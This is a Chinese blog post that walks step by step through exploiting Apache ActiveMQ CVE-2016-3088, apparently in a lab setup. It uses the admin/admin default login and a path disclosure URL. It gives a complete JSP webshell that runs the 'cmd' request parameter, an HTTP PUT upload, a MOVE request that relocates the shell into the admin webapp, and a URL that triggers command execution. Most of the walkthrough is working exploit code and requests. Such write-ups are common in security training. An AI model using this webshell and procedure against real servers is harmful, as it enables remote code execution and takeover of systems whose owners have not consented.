返回顶部

activemq 远程代码执行 (CVE-2016-3088)

目录

1、漏洞描述

2、IP:port 访问

3、登录后台

4、登录成功

5、获取ActiveMQ的绝对路径

6、burp抓包上传jsp木马

7、204上传成功

8、尝试访问但没有被命令执行

9、MOVE文件至可执行目录下

10、再次访问命令执行成功


1、漏洞描述

         ActiveMQ 是 Apache 软件基金会下的一个开源消息驱动中间件软件。 ActiveMQ中的fileserver服务允许用户通过HTTP PUT方法上传文件到指定目录。Fileserver支持写入文件(不解析jsp),但是支持移动文件(Move)我们可以将jsp的文件PUT到Fileserver下,然后再通过Move指令移动到可执行目录下访问。 用户名密码:admin:admin 路径:fileopt/apache-activemq-5.11.1/webapps

2、IP:port 访问

3、登录后台

193.168.0.45:36411/admin 账号密码:admin/admin

4、登录成功

5、获取ActiveMQ的绝对路径

http://your-ip:port/admin/test/systemProperties.jsp

6、burp抓包上传jsp木马

<%@ page import="java.io.*" %> <% try { String cmd = request.getParameter("cmd"); Process child = Runtime.getRuntime().exec(cmd); InputStream in = child.getInputStream(); int c; while ((c = in.read()) != -1) { out.print((char)c); } in.close(); try { child.waitFor(); } catch (InterruptedException e) { e.printStackTrace(); } } catch (IOException e) { System.err.println(e); } %>

7、204上传成功

8、尝试访问但没有被命令执行

http://193.168.0.45:36411/fileserver/1.jsp​​​​​​​

9、MOVE文件至可执行目录下

MOVE /fileserver/1.jsp HTTP/1.1 Host: 193.168.0.45:36411 Destination: file:///opt/activemq/webapps/admin/1.jsp

10、再次访问命令执行成功

http://193.168.0.45:36411/admin/1.jsp?cmd=ls%20/tmp


__EOF__

本文作者流年
本文链接https://www.cnblogs.com/it-sec/p/18574571.html
关于博主:评论和私信会在第一时间回复。或者直接私信我。
版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
声援博主:如果您觉得文章对您有帮助,可以点击文章右下角推荐一下。您的鼓励是博主的最大动力!
posted @   IT-sec  阅读(18)  评论(0编辑  收藏  举报  
相关博文:
阅读排行:
· winform 绘制太阳,地球,月球 运作规律
· AI与.NET技术实操系列(五):向量存储与相似性搜索在 .NET 中的实现
· 超详细:普通电脑也行Windows部署deepseek R1训练数据并当服务器共享给他人
· 【硬核科普】Trae如何「偷看」你的代码?零基础破解AI编程运行原理
· 上周热点回顾(3.3-3.9)
点击右上角即可分享
微信分享提示